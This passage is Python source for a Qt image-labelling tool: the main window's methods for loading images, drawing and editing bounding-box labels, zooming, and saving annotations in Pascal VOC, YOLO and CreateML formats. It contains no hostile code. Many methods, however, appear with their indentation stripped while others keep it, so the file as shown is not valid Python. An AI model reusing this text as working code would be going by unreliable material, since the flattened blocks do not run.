    self.statusBar().show()
    # Application state.
    self.image = QImage()
    self.filePath = ustr(defaultFilename)
    self.lastOpenDir= None
    self.recentFiles = []
    self.maxRecent = 7
    self.lineColor = None
    self.fillColor = None
    self.zoom_level = 100
    self.fit_window = False
    # Add Chris
    self.difficult = False
    ## Fix the compatible issue for qt4 and qt5. Convert the QStringList to python list
    if settings.get(SETTING_RECENT_FILES):
        if have_qstring():
            recentFileQStringList = settings.get(SETTING_RECENT_FILES)
            self.recentFiles = [ustr(i) for i in recentFileQStringList]
        else:
            self.recentFiles = recentFileQStringList = settings.get(SETTING_RECENT_FILES)
    size = settings.get(SETTING_WIN_SIZE, QSize(600, 500))
    position = QPoint(0, 0)
    saved_position = settings.get(SETTING_WIN_POSE, position)
    # Fix the multiple monitors issue
    for i in range(QApplication.desktop().screenCount()):
        if QApplication.desktop().availableGeometry(i).contains(saved_position):
            position = saved_position
            break
    self.resize(size)
    self.move(position)
    saveDir = ustr(settings.get(SETTING_SAVE_DIR, None))
    self.lastOpenDir = ustr(settings.get(SETTING_LAST_OPEN_DIR, None))
    if self.defaultSaveDir is None and saveDir is not None and os.path.exists(saveDir):
        self.defaultSaveDir = saveDir
        self.statusBar().showMessage('%s started. Annotation will be saved to %s' %
                                     (__appname__, self.defaultSaveDir))
        self.statusBar().show()
    self.restoreState(settings.get(SETTING_WIN_STATE, QByteArray()))
    Shape.line_color = self.lineColor = QColor(settings.get(SETTING_LINE_COLOR, DEFAULT_LINE_COLOR))
    Shape.fill_color = self.fillColor = QColor(settings.get(SETTING_FILL_COLOR, DEFAULT_FILL_COLOR))
    self.canvas.setDrawingColor(self.lineColor)
    # Add chris
    Shape.difficult = self.difficult
    def xbool(x):
        # Coerce either a QVariant (qt4) or a plain value (qt5) to bool.
        if isinstance(x, QVariant):
            return x.toBool()
        return bool(x)
    if xbool(settings.get(SETTING_ADVANCE_MODE, False)):
        self.actions.advancedMode.setChecked(True)
        self.toggleAdvancedMode()
    # Populate the File menu dynamically.
    self.updateFileMenu()
    # Since loading the file may take some time, make sure it runs in the background.
    if self.filePath and os.path.isdir(self.filePath):
        self.queueEvent(partial(self.importDirImages, self.filePath or ""))
    elif self.filePath:
        self.queueEvent(partial(self.loadFile, self.filePath or ""))
    # Callbacks:
    self.zoomWidget.valueChanged.connect(self.paintCanvas)
    self.populateModeActions()
    # Display cursor coordinates at the right of status bar
    self.labelCoordinates = QLabel('')
    self.statusBar().addPermanentWidget(self.labelCoordinates)
    # Open Dir if deafult file
    if self.filePath and os.path.isdir(self.filePath):
        self.openDirDialog(dirpath=self.filePath, silent=True)
def keyReleaseEvent(self, event):
if event.key() == Qt.Key_Control:
self.canvas.setDrawingShapeToSquare(False)
def keyPressEvent(self, event):
if event.key() == Qt.Key_Control:
# Draw rectangle if Ctrl is pressed
self.canvas.setDrawingShapeToSquare(True)
## Support Functions ##
def set_format(self, save_format):
if save_format == FORMAT_PASCALVOC:
self.actions.save_format.setText(FORMAT_PASCALVOC)
self.actions.save_format.setIcon(newIcon("format_voc"))
self.labelFileFormat = LabelFileFormat.PASCAL_VOC
LabelFile.suffix = XML_EXT
elif save_format == FORMAT_YOLO:
self.actions.save_format.setText(FORMAT_YOLO)
self.actions.save_format.setIcon(newIcon("format_yolo"))
self.labelFileFormat = LabelFileFormat.YOLO
LabelFile.suffix = TXT_EXT
elif save_format == FORMAT_CREATEML:
self.actions.save_format.setText(FORMAT_CREATEML)
self.actions.save_format.setIcon(newIcon("format_createml"))
self.labelFileFormat = LabelFileFormat.CREATE_ML
LabelFile.suffix = JSON_EXT
def change_format(self):
if self.labelFileFormat == LabelFileFormat.PASCAL_VOC:
self.set_format(FORMAT_YOLO)
elif self.labelFileFormat == LabelFileFormat.YOLO:
self.set_format(FORMAT_CREATEML)
elif self.labelFileFormat == LabelFileFormat.CREATE_ML:
self.set_format(FORMAT_PASCALVOC)
else:
raise ValueError('Unknown label file format.')
self.setDirty()
def noShapes(self):
return not self.itemsToShapes
    def toggleAdvancedMode(self, value=True):
        """Switch between beginner (value=False) and advanced (value=True) UI.

        Rebuilds the toolbars/menus and shows or hides the edit button.
        NOTE(review): leaving advanced mode toggles the dock features with
        XOR, which assumes they were previously OR-ed in — confirm the
        dock state machine before touching this.
        """
        self._beginner = not value
        self.canvas.setEditing(True)
        self.populateModeActions()
        self.editButton.setVisible(not value)
        if value:
            self.actions.createMode.setEnabled(True)
            self.actions.editMode.setEnabled(False)
            self.dock.setFeatures(self.dock.features() | self.dockFeatures)
        else:
            self.dock.setFeatures(self.dock.features() ^ self.dockFeatures)
    def populateModeActions(self):
        """Rebuild the toolbar, canvas context menu, and edit menu for the
        current (beginner/advanced) mode."""
        if self.beginner():
            tool, menu = self.actions.beginner, self.actions.beginnerContext
        else:
            tool, menu = self.actions.advanced, self.actions.advancedContext
        self.tools.clear()
        addActions(self.tools, tool)
        # menus[0] is the canvas right-click context menu.
        self.canvas.menus[0].clear()
        addActions(self.canvas.menus[0], menu)
        self.menus.edit.clear()
        actions = (self.actions.create,) if self.beginner()\
            else (self.actions.createMode, self.actions.editMode)
        addActions(self.menus.edit, actions + self.actions.editMenu)
    def setBeginner(self):
        """Replace the toolbar contents with the beginner action set."""
        self.tools.clear()
        addActions(self.tools, self.actions.beginner)
    def setAdvanced(self):
        """Replace the toolbar contents with the advanced action set."""
        self.tools.clear()
        addActions(self.tools, self.actions.advanced)
    def setDirty(self):
        """Mark the current annotation as modified and enable Save."""
        self.dirty = True
        self.actions.save.setEnabled(True)
    def setClean(self):
        """Mark the annotation as saved: disable Save, re-enable Create."""
        self.dirty = False
        self.actions.save.setEnabled(False)
        self.actions.create.setEnabled(True)
def toggleActions(self, value=True):
"""Enable/Disable widgets which depend on an opened image."""
for z in self.actions.zoomActions:
z.setEnabled(value)
for action in self.actions.onLoadActive:
action.setEnabled(value)
    def queueEvent(self, function):
        """Run `function` on the next event-loop iteration (non-blocking)."""
        QTimer.singleShot(0, function)
    def status(self, message, delay=5000):
        """Show `message` in the status bar for `delay` milliseconds."""
        self.statusBar().showMessage(message, delay)
    def resetState(self):
        """Clear all per-image state before loading another file."""
        self.itemsToShapes.clear()
        self.shapesToItems.clear()
        self.labelList.clear()
        self.filePath = None
        self.imageData = None
        self.labelFile = None
        self.canvas.resetState()
        self.labelCoordinates.clear()
        self.comboBox.cb.clear()
def currentItem(self):
items = self.labelList.selectedItems()
if items:
return items[0]
return None
def addRecentFile(self, filePath):
if filePath in self.recentFiles:
self.recentFiles.remove(filePath)
elif len(self.recentFiles) >= self.maxRecent:
self.recentFiles.pop()
self.recentFiles.insert(0, filePath)
def beginner(self):
return self._beginner
def advanced(self):
return not self.beginner()
    def getAvailableScreencastViewer(self):
        """Return the command list used to open the tutorial screencast.

        NOTE(review): implicitly returns None on unrecognised platforms,
        which would break showTutorialDialog — confirm whether a generic
        fallback is wanted.
        """
        osName = platform.system()
        if osName == 'Windows':
            return ['C:\\Program Files\\Internet Explorer\\iexplore.exe']
        elif osName == 'Linux':
            return ['xdg-open']
        elif osName == 'Darwin':
            return ['open']
## Callbacks ##
    def showTutorialDialog(self):
        """Open the tutorial screencast URL in the platform's viewer."""
        subprocess.Popen(self.screencastViewer + [self.screencast])
    def showInfoDialog(self):
        """Show an About dialog with app name, version, and Python version."""
        # Imported locally to avoid a circular import at module load time.
        from libs.__init__ import __version__
        msg = u'Name:{0} \nApp Version:{1} \n{2} '.format(__appname__, __version__, sys.version_info)
        QMessageBox.information(self, u'Information', msg)
    def createShape(self):
        """Enter shape-creation mode (beginner UI only)."""
        assert self.beginner()
        self.canvas.setEditing(False)
        self.actions.create.setEnabled(False)
    def toggleDrawingSensitive(self, drawing=True):
        """In the middle of drawing, toggling between modes should be disabled."""
        self.actions.editMode.setEnabled(not drawing)
        if not drawing and self.beginner():
            # Cancel creation.
            print('Cancel creation.')
            self.canvas.setEditing(True)
            self.canvas.restoreCursor()
            self.actions.create.setEnabled(True)
    def toggleDrawMode(self, edit=True):
        """Switch the canvas between edit (True) and create (False) modes."""
        self.canvas.setEditing(edit)
        self.actions.createMode.setEnabled(edit)
        self.actions.editMode.setEnabled(not edit)
    def setCreateMode(self):
        """Enter create mode (advanced UI only)."""
        assert self.advanced()
        self.toggleDrawMode(False)
    def setEditMode(self):
        """Enter edit mode (advanced UI only) and re-sync the selection."""
        assert self.advanced()
        self.toggleDrawMode(True)
        self.labelSelectionChanged()
    def updateFileMenu(self):
        """Rebuild the recent-files menu, skipping the current file and
        any file that no longer exists on disk."""
        currFilePath = self.filePath

        def exists(filename):
            return os.path.exists(filename)
        menu = self.menus.recentFiles
        menu.clear()
        files = [f for f in self.recentFiles if f !=
                 currFilePath and exists(f)]
        for i, f in enumerate(files):
            icon = newIcon('labels')
            action = QAction(
                icon, '&%d %s' % (i + 1, QFileInfo(f).fileName()), self)
            action.triggered.connect(partial(self.loadRecent, f))
            menu.addAction(action)
    def popLabelListMenu(self, point):
        """Show the label-list context menu at the given widget position."""
        self.menus.labelList.exec_(self.labelList.mapToGlobal(point))
    def editLabel(self):
        """Prompt for a new label text for the selected item and apply it."""
        if not self.canvas.editing():
            return
        item = self.currentItem()
        if not item:
            return
        text = self.labelDialog.popUp(item.text())
        if text is not None:
            item.setText(text)
            # Item background colour is derived from the label text.
            item.setBackground(generateColorByText(text))
            self.setDirty()
            self.updateComboBox()
# Tzutalin 20160906 : Add file list and dock to move faster
    def fileitemDoubleClicked(self, item=None):
        """Open the image double-clicked in the file-list dock.

        NOTE(review): `self.mImgList.index(...)` raises ValueError if the
        item text is not in the list — assumed to always match here.
        """
        currIndex = self.mImgList.index(ustr(item.text()))
        if currIndex < len(self.mImgList):
            filename = self.mImgList[currIndex]
            if filename:
                self.loadFile(filename)
# Add chris
def btnstate(self, item= None):
""" Function to handle difficult examples
Update on each object """
if not self.canvas.editing():
return
item = self.currentItem()
if not item: # If not selected Item, take the first one
item = self.labelList.item(self.labelList.count()-1)
difficult = self.diffcButton.isChecked()
try:
shape = self.itemsToShapes[item]
except:
pass
# Checked and Update
try:
if difficult != shape.difficult:
shape.difficult = difficult
self.setDirty()
else: # User probably changed item visibility
self.canvas.setShapeVisible(shape, item.checkState() == Qt.Checked)
except:
pass
# React to canvas signals.
    def shapeSelectionChanged(self, selected=False):
        """Sync the label list and action enablement with the canvas selection.

        `_noSelectionSlot` suppresses one round-trip when the selection was
        initiated from the label list itself.
        """
        if self._noSelectionSlot:
            self._noSelectionSlot = False
        else:
            shape = self.canvas.selectedShape
            if shape:
                self.shapesToItems[shape].setSelected(True)
            else:
                self.labelList.clearSelection()
        self.actions.delete.setEnabled(selected)
        self.actions.copy.setEnabled(selected)
        self.actions.edit.setEnabled(selected)
        self.actions.shapeLineColor.setEnabled(selected)
        self.actions.shapeFillColor.setEnabled(selected)
    def addLabel(self, shape):
        """Register `shape` in the label list and the shape<->item maps."""
        shape.paintLabel = self.displayLabelOption.isChecked()
        item = HashableQListWidgetItem(shape.label)
        item.setFlags(item.flags() | Qt.ItemIsUserCheckable)
        item.setCheckState(Qt.Checked)
        item.setBackground(generateColorByText(shape.label))
        self.itemsToShapes[item] = shape
        self.shapesToItems[shape] = item
        self.labelList.addItem(item)
        # At least one shape now exists: enable shape-dependent actions.
        for action in self.actions.onShapesPresent:
            action.setEnabled(True)
        self.updateComboBox()
    def remLabel(self, shape):
        """Remove `shape`'s entry from the label list and both lookup maps."""
        if shape is None:
            # Nothing was deleted on the canvas; ignore.
            return
        item = self.shapesToItems[shape]
        self.labelList.takeItem(self.labelList.row(item))
        del self.shapesToItems[shape]
        del self.itemsToShapes[item]
        self.updateComboBox()
    def loadLabels(self, shapes):
        """Create canvas shapes from parsed annotation tuples.

        Each element of `shapes` is (label, points, line_color, fill_color,
        difficult). Points outside the image are snapped back inside and
        the document is marked dirty in that case.
        """
        s = []
        for label, points, line_color, fill_color, difficult in shapes:
            shape = Shape(label=label)
            for x, y in points:
                # Ensure the labels are within the bounds of the image. If not, fix them.
                x, y, snapped = self.canvas.snapPointToCanvas(x, y)
                if snapped:
                    self.setDirty()
                shape.addPoint(QPointF(x, y))
            shape.difficult = difficult
            shape.close()
            s.append(shape)
            # Fall back to a colour derived from the label text when the
            # annotation file carried no explicit colours.
            if line_color:
                shape.line_color = QColor(*line_color)
            else:
                shape.line_color = generateColorByText(label)
            if fill_color:
                shape.fill_color = QColor(*fill_color)
            else:
                shape.fill_color = generateColorByText(label)
            self.addLabel(shape)
        self.updateComboBox()
        self.canvas.loadShapes(s)
def updateComboBox(self):
# Get the unique labels and add them to the Combobox.
itemsTextList = [str(self.labelList.item(i).text()) for i in range(self.labelList.count())]
uniqueTextList = list(set(itemsTextList))
# Add a null row for showing all the labels
uniqueTextList.append("")
uniqueTextList.sort()
self.comboBox.update_items(uniqueTextList)
    def saveLabels(self, annotationFilePath):
        """Serialize the current shapes to `annotationFilePath`.

        The on-disk format (and enforced file extension) follows
        `self.labelFileFormat`. Returns True on success, False after
        showing an error dialog on failure.
        """
        annotationFilePath = ustr(annotationFilePath)
        if self.labelFile is None:
            self.labelFile = LabelFile()
            self.labelFile.verified = self.canvas.verified

        def format_shape(s):
            # Convert a canvas Shape into the plain-dict form the writers expect.
            return dict(label=s.label,
                        line_color=s.line_color.getRgb(),
                        fill_color=s.fill_color.getRgb(),
                        points=[(p.x(), p.y()) for p in s.points],
                        # add chris
                        difficult = s.difficult)
        shapes = [format_shape(shape) for shape in self.canvas.shapes]
        # Can add differrent annotation formats here
        try:
            if self.labelFileFormat == LabelFileFormat.PASCAL_VOC:
                if annotationFilePath[-4:].lower() != ".xml":
                    annotationFilePath += XML_EXT
                self.labelFile.savePascalVocFormat(annotationFilePath, shapes, self.filePath, self.imageData,
                                                   self.lineColor.getRgb(), self.fillColor.getRgb())
            elif self.labelFileFormat == LabelFileFormat.YOLO:
                if annotationFilePath[-4:].lower() != ".txt":
                    annotationFilePath += TXT_EXT
                self.labelFile.saveYoloFormat(annotationFilePath, shapes, self.filePath, self.imageData, self.labelHist,
                                              self.lineColor.getRgb(), self.fillColor.getRgb())
            elif self.labelFileFormat == LabelFileFormat.CREATE_ML:
                if annotationFilePath[-5:].lower() != ".json":
                    annotationFilePath += JSON_EXT
                self.labelFile.saveCreateMLFormat(annotationFilePath, shapes, self.filePath, self.imageData,
                                                  self.labelHist, self.lineColor.getRgb(), self.fillColor.getRgb())
            else:
                self.labelFile.save(annotationFilePath, shapes, self.filePath, self.imageData,
                                    self.lineColor.getRgb(), self.fillColor.getRgb())
            print('Image:{0} -> Annotation:{1}'.format(self.filePath, annotationFilePath))
            return True
        except LabelFileError as e:
            self.errorMessage(u'Error saving label data', u'<b>%s</b>' % e)
            return False
    def copySelectedShape(self):
        """Duplicate the selected shape and select the copy."""
        self.addLabel(self.canvas.copySelectedShape())
        # fix copy and delete
        self.shapeSelectionChanged(True)
def comboSelectionChanged(self, index):
text = self.comboBox.cb.itemText(index)
for i in range(self.labelList.count()):
if text == "":
self.labelList.item(i).setCheckState(2)
elif text != self.labelList.item(i).text():
self.labelList.item(i).setCheckState(0)
else:
self.labelList.item(i).setCheckState(2)
    def labelSelectionChanged(self):
        """Propagate a label-list selection to the canvas and the
        "difficult" checkbox."""
        item = self.currentItem()
        if item and self.canvas.editing():
            # Suppress the echo back from the canvas selection signal.
            self._noSelectionSlot = True
            self.canvas.selectShape(self.itemsToShapes[item])
            shape = self.itemsToShapes[item]
            # Add Chris
            self.diffcButton.setChecked(shape.difficult)
    def labelItemChanged(self, item):
        """React to a label-list item edit: rename the shape or toggle its
        visibility on the canvas."""
        shape = self.itemsToShapes[item]
        label = item.text()
        if label != shape.label:
            shape.label = item.text()
            shape.line_color = generateColorByText(shape.label)
            self.setDirty()
        else:  # User probably changed item visibility
            self.canvas.setShapeVisible(shape, item.checkState() == Qt.Checked)
# Callback functions:
    def newShape(self):
        """Pop-up and give focus to the label editor.

        position MUST be in global coordinates.
        """
        if not self.useDefaultLabelCheckbox.isChecked() or not self.defaultLabelTextLine.text():
            if len(self.labelHist) > 0:
                self.labelDialog = LabelDialog(
                    parent=self, listItem=self.labelHist)
            # Sync single class mode from PR#106
            if self.singleClassMode.isChecked() and self.lastLabel:
                text = self.lastLabel
            else:
                text = self.labelDialog.popUp(text=self.prevLabelText)
                self.lastLabel = text
        else:
            text = self.defaultLabelTextLine.text()
        # Add Chris
        self.diffcButton.setChecked(False)
        if text is not None:
            self.prevLabelText = text
            generate_color = generateColorByText(text)
            shape = self.canvas.setLastLabel(text, generate_color, generate_color)
            self.addLabel(shape)
            if self.beginner():  # Switch to edit mode.
                self.canvas.setEditing(True)
                self.actions.create.setEnabled(True)
            else:
                self.actions.editMode.setEnabled(True)
            self.setDirty()
            if text not in self.labelHist:
                self.labelHist.append(text)
        else:
            # User cancelled the dialog: discard the in-progress shape.
            # self.canvas.undoLastLine()
            self.canvas.resetAllLines()
def scrollRequest(self, delta, orientation):
units = - delta / (8 * 15)
bar = self.scrollBars[orientation]
bar.setValue(bar.value() + bar.singleStep() * units)
    def setZoom(self, value):
        """Set an explicit zoom percentage and switch to manual zoom mode."""
        self.actions.fitWidth.setChecked(False)
        self.actions.fitWindow.setChecked(False)
        self.zoomMode = self.MANUAL_ZOOM
        self.zoomWidget.setValue(value)
    def addZoom(self, increment=10):
        """Adjust the zoom by `increment` percentage points."""
        self.setZoom(self.zoomWidget.value() + increment)
def zoomRequest(self, delta):
# get the current scrollbar positions
# calculate the percentages ~ coordinates
h_bar = self.scrollBars[Qt.Horizontal]
v_bar = self.scrollBars[Qt.Vertical]
# get the current maximum, to know the difference after zooming
h_bar_max = h_bar.maximum()
v_bar_max = v_bar.maximum()
# get the cursor position and canvas size
# calculate the desired movement from 0 to 1
# where 0 = move left
# 1 = move right
# up and down analogous
cursor = QCursor()
pos = cursor.pos()
relative_pos = QWidget.mapFromGlobal(self, pos)
cursor_x = relative_pos.x()
cursor_y = relative_pos.y()
w = self.scrollArea.width()
h = self.scrollArea.height()
# the scaling from 0 to 1 has some padding
# you don't have to hit the very leftmost pixel for a maximum-left movement
margin = 0.1
move_x = (cursor_x - margin * w) / (w - 2 * margin * w)
move_y = (cursor_y - margin * h) / (h - 2 * margin * h)
# clamp the values from 0 to 1
move_x = min(max(move_x, 0), 1)
move_y = min(max(move_y, 0), 1)
# zoom in
units = delta / (8 * 15)
scale = 10
self.addZoom(scale * units)
# get the difference in scrollbar values
# this is how far we can move
d_h_bar_max = h_bar.maximum() - h_bar_max
d_v_bar_max = v_bar.maximum() - v_bar_max
# get the new scrollbar values
new_h_bar_value = h_bar.value() + move_x * d_h_bar_max
new_v_bar_value = v_bar.value() + move_y * d_v_bar_max
h_bar.setValue(new_h_bar_value)
v_bar.setValue(new_v_bar_value)
    def setFitWindow(self, value=True):
        """Toggle fit-to-window zoom mode and rescale the canvas."""
        if value:
            self.actions.fitWidth.setChecked(False)
        self.zoomMode = self.FIT_WINDOW if value else self.MANUAL_ZOOM
        self.adjustScale()
    def setFitWidth(self, value=True):
        """Toggle fit-to-width zoom mode and rescale the canvas."""
        if value:
            self.actions.fitWindow.setChecked(False)
        self.zoomMode = self.FIT_WIDTH if value else self.MANUAL_ZOOM
        self.adjustScale()
def togglePolygons(self, value):
for item, shape in self.itemsToShapes.items():
item.setCheckState(Qt.Checked if value else Qt.Unchecked)
    def loadFile(self, filePath=None):
        """Load the specified file, or the last opened file if None.

        Resets per-image state, highlights the file in the file-list dock,
        loads either a label file (with embedded image data) or a plain
        image, restores annotations if available, and rescales the canvas.
        Returns True on success, False otherwise.
        """
        self.resetState()
        self.canvas.setEnabled(False)
        if filePath is None:
            filePath = self.settings.get(SETTING_FILENAME)
        # Make sure that filePath is a regular python string, rather than QString
        filePath = ustr(filePath)
        # Fix bug: An index error after select a directory when open a new file.
        unicodeFilePath = ustr(filePath)
        unicodeFilePath = os.path.abspath(unicodeFilePath)
        # Tzutalin 20160906 : Add file list and dock to move faster
        # Highlight the file item
        if unicodeFilePath and self.fileListWidget.count() > 0:
            if unicodeFilePath in self.mImgList:
                index = self.mImgList.index(unicodeFilePath)
                fileWidgetItem = self.fileListWidget.item(index)
                fileWidgetItem.setSelected(True)
            else:
                self.fileListWidget.clear()
                self.mImgList.clear()
        if unicodeFilePath and os.path.exists(unicodeFilePath):
            if LabelFile.isLabelFile(unicodeFilePath):
                try:
                    self.labelFile = LabelFile(unicodeFilePath)
                except LabelFileError as e:
                    self.errorMessage(u'Error opening file',
                                      (u"<p><b>%s</b></p>"
                                       u"<p>Make sure <i>%s</i> is a valid label file.")
                                      % (e, unicodeFilePath))
                    self.status("Error reading %s" % unicodeFilePath)
                    return False
                self.imageData = self.labelFile.imageData
                self.lineColor = QColor(*self.labelFile.lineColor)
                self.fillColor = QColor(*self.labelFile.fillColor)
                self.canvas.verified = self.labelFile.verified
            else:
                # Load image:
                # read data first and store for saving into label file.
                self.imageData = read(unicodeFilePath, None)
                self.labelFile = None
                self.canvas.verified = False
            if isinstance(self.imageData, QImage):
                image = self.imageData
            else:
                image = QImage.fromData(self.imageData)
            if image.isNull():
                self.errorMessage(u'Error opening file',
                                  u"<p>Make sure <i>%s</i> is a valid image file." % unicodeFilePath)
                self.status("Error reading %s" % unicodeFilePath)
                return False
            self.status("Loaded %s" % os.path.basename(unicodeFilePath))
            self.image = image
            self.filePath = unicodeFilePath
            self.canvas.loadPixmap(QPixmap.fromImage(image))
            if self.labelFile:
                self.loadLabels(self.labelFile.shapes)
            self.setClean()
            self.canvas.setEnabled(True)
            self.adjustScale(initial=True)
            self.paintCanvas()
            self.addRecentFile(self.filePath)
            self.toggleActions(True)
            # Load any sidecar annotation file (XML/TXT/JSON) for this image.
            self.showBoundingBoxFromAnnotationFile(filePath)
            self.setWindowTitle(__appname__ + ' ' + filePath)
            # Default : select last item if there is at least one item
            if self.labelList.count():
                self.labelList.setCurrentItem(self.labelList.item(self.labelList.count()-1))
                self.labelList.item(self.labelList.count()-1).setSelected(True)
            self.canvas.setFocus(True)
            return True
        return False
    def showBoundingBoxFromAnnotationFile(self, filePath):
        """Load the annotation sidecar for `filePath`, if one exists.

        Looks in `defaultSaveDir` first (when set), else next to the image.
        """
        if self.defaultSaveDir is not None:
            basename = os.path.basename(
                os.path.splitext(filePath)[0])
            # NOTE(review): CreateML stores one JSON per *directory*; the
            # parent-directory name is recovered from the path here.
            filedir = filePath.split(basename)[0].split(os.path.sep)[-2:-1][0]
            xmlPath = os.path.join(self.defaultSaveDir, basename + XML_EXT)
            txtPath = os.path.join(self.defaultSaveDir, basename + TXT_EXT)
            jsonPath = os.path.join(self.defaultSaveDir, filedir + JSON_EXT)
            """Annotation file priority:
            PascalXML > YOLO
            """
            if os.path.isfile(xmlPath):
                self.loadPascalXMLByFilename(xmlPath)
            elif os.path.isfile(txtPath):
                self.loadYOLOTXTByFilename(txtPath)
            elif os.path.isfile(jsonPath):
                self.loadCreateMLJSONByFilename(jsonPath, filePath)
        else:
            xmlPath = os.path.splitext(filePath)[0] + XML_EXT
            txtPath = os.path.splitext(filePath)[0] + TXT_EXT
            if os.path.isfile(xmlPath):
                self.loadPascalXMLByFilename(xmlPath)
            elif os.path.isfile(txtPath):
                self.loadYOLOTXTByFilename(txtPath)
    def resizeEvent(self, event):
        """Re-fit the image when the window is resized (unless zoom is manual)."""
        if self.canvas and not self.image.isNull()\
           and self.zoomMode != self.MANUAL_ZOOM:
            self.adjustScale()
        super(MainWindow, self).resizeEvent(event)
    def paintCanvas(self):
        """Apply the current zoom to the canvas and schedule a repaint."""
        assert not self.image.isNull(), "cannot paint null image"
        # zoomWidget holds a percentage; canvas.scale is a plain factor.
        self.canvas.scale = 0.01 * self.zoomWidget.value()
        self.canvas.adjustSize()
        self.canvas.update()
    def adjustScale(self, initial=False):
        """Recompute the zoom for the current mode (fit-window on first load)."""
        value = self.scalers[self.FIT_WINDOW if initial else self.zoomMode]()
        self.zoomWidget.setValue(int(100 * value))
def scaleFitWindow(self):
"""Figure out the size of the pixmap in order to fit the main widget."""
e = 2.0 # So that no scrollbars are generated.
w1 = self.centralWidget().width() - e
h1 = self.centralWidget().height() - e
a1 = w1 / h1
# Calculate a new scale value based on the pixmap's aspect ratio.
w2 = self.canvas.pixmap.width() - 0.0
h2 = self.canvas.pixmap.height() - 0.0
a2 = w2 / h2
return w1 / w2 if a2 >= a1 else h1 / h2
def scaleFitWidth(self):
# The epsilon does not seem to work too well here.
w = self.centralWidget().width() - 2.0
return w / self.canvas.pixmap.width()
def closeEvent(self, event):
if not self.mayContinue():
event.ignore()
settings = self.settings
# If it loads images from dir, don't load it at the begining
if self.dirname is None:
settings[SETTING_FILENAME] = self.filePath if self.filePath else ''
else:
settings[SETTING_FILENAME] = ''
settings[SETTING_WIN_SIZE] = self.size()
settings[SETTING_WIN_POSE] = self.pos()
settings[SETTING_WIN_STATE] = self.saveState()
settings[SETTING_LINE_COLOR] = self.lineColor
settings[SETTING_FILL_COLOR] = self.fillColor
settings[SETTING_RECENT_FILES] = self.recentFiles
settings[SETTING_ADVANCE_MODE] = not self._beginner
if self.defaultSaveDir and os.path.exists(self.defaultSaveDir):
settings[SETTING_SAVE_DIR] = ustr(self.defaultSaveDir)
else:
settings[SETTING_SAVE_DIR] = ''
if self.lastOpenDir and os.path.exists(self.lastOpenDir):
settings[SETTING_LAST_OPEN_DIR] = self.lastOpenDir
else:
settings[SETTING_LAST_OPEN_DIR] = ''
settings[SETTING_AUTO_SAVE] = self.autoSaving.isChecked()
settings[SETTING_SINGLE_CLASS] = self.singleClassMode.isChecked()
settings[SETTING_PAINT_LABEL] = self.displayLabelOption.isChecked()
settings[SETTING_DRAW_SQUARE] = self.drawSquaresOption.isChecked()
settings[SETTING_LABEL_FILE_FORMAT] = self.labelFileFormat
settings.save()
    def loadRecent(self, filename):
        """Open a file from the recent-files menu (after the unsaved check)."""
        if self.mayContinue():
            self.loadFile(filename)
def scanAllImages(self, folderPath):
extensions = ['.%s' % fmt.data().decode("ascii").lower() for fmt in QImageReader.supportedImageFormats()]
images = []
for root, dirs, files in os.walk(folderPath):
for file in files:
if file.lower().endswith(tuple(extensions)):
relativePath = os.path.join(root, file)
path = ustr(os.path.abspath(relativePath))
images.append(path)
natural_sort(images, key=lambda x: x.lower())
return images
    def changeSavedirDialog(self, _value=False):
        """Let the user pick the directory where annotations are saved."""
        if self.defaultSaveDir is not None:
            path = ustr(self.defaultSaveDir)
        else:
            path = '.'
        dirpath = ustr(QFileDialog.getExistingDirectory(self,
                                                        '%s - Save annotations to the directory' % __appname__, path, QFileDialog.ShowDirsOnly
                                                        | QFileDialog.DontResolveSymlinks))
        if dirpath is not None and len(dirpath) > 1:
            self.defaultSaveDir = dirpath
        self.statusBar().showMessage('%s . Annotation will be saved to %s' %
                                     ('Change saved folder', self.defaultSaveDir))
        self.statusBar().show()
    def openAnnotationDialog(self, _value=False):
        """Let the user pick an annotation XML to load for the current image.

        Only implemented for the Pascal VOC format; a no-op otherwise.
        """
        if self.filePath is None:
            self.statusBar().showMessage('Please select image first')
            self.statusBar().show()
            return
        path = os.path.dirname(ustr(self.filePath))\
            if self.filePath else '.'
        if self.labelFileFormat == LabelFileFormat.PASCAL_VOC:
            filters = "Open Annotation XML file (%s)" % ' '.join(['*.xml'])
            filename = ustr(QFileDialog.getOpenFileName(self,'%s - Choose a xml file' % __appname__, path, filters))
            if filename:
                if isinstance(filename, (tuple, list)):
                    filename = filename[0]
                self.loadPascalXMLByFilename(filename)
def openDirDialog(self, _value=False, dirpath=None, silent=False):
if not self.mayContinue():
return
defaultOpenDirPath = dirpath if dirpath else '.'
if self.lastOpenDir and os.path.exists(self.lastOpenDir):
defaultOpenDirPath = self.lastOpenDir
else:
defaultOpenDirPath = os.path.dirname(self.filePath) if self.filePath else '.'
if silent!=True :
targetDirPath = ustr(QFileDialog.getExistingDirectory(self,
'%s - Open Directory' % __appname__, defaultOpenDirPath,
QFileDialog.ShowDirsOnly | QFileDialog.DontResolveSymlinks))
else:
targetDirPath = ustr(defaultOpenDirPath)
self.lastOpenDir = targetDirPath
self.importDirImages(targetDirPath)
    def importDirImages(self, dirpath):
        """Scan `dirpath` for images, populate the file-list dock, and open
        the first image."""
        if not self.mayContinue() or not dirpath:
            return
        self.lastOpenDir = dirpath
        self.dirname = dirpath
        self.filePath = None
        self.fileListWidget.clear()
        self.mImgList = self.scanAllImages(dirpath)
        # filePath is None here, so openNextImg loads mImgList[0].
        self.openNextImg()
        for imgPath in self.mImgList:
            item = QListWidgetItem(imgPath)
            self.fileListWidget.addItem(item)
def verifyImg(self, _value=False):
# Proceding next image without dialog if having any label
if self.filePath is not None:
try:
self.labelFile.toggleVerify()
except AttributeError:
# If the labelling file does not exist yet, create if and
# re-save it with the verified attribute.
self.saveFile()
if self.labelFile != None:
self.labelFile.toggleVerify()
else:
return
self.canvas.verified = self.labelFile.verified
self.paintCanvas()
self.saveFile()
    def openPrevImg(self, _value=False):
        """Open the previous image in the directory listing.

        Auto-saves first when the auto-save option is on; otherwise prompts
        via mayContinue().
        """
        # Proceding prev image without dialog if having any label
        if self.autoSaving.isChecked():
            if self.defaultSaveDir is not None:
                if self.dirty is True:
                    self.saveFile()
            else:
                # Auto-save needs a target directory before it can proceed.
                self.changeSavedirDialog()
                return
        if not self.mayContinue():
            return
        if len(self.mImgList) <= 0:
            return
        if self.filePath is None:
            return
        currIndex = self.mImgList.index(self.filePath)
        if currIndex - 1 >= 0:
            filename = self.mImgList[currIndex - 1]
            if filename:
                self.loadFile(filename)
    def openNextImg(self, _value=False):
        """Open the next image in the directory listing (or the first one
        when no file is open yet).

        Auto-saves first when the auto-save option is on; otherwise prompts
        via mayContinue().
        """
        # Proceding prev image without dialog if having any label
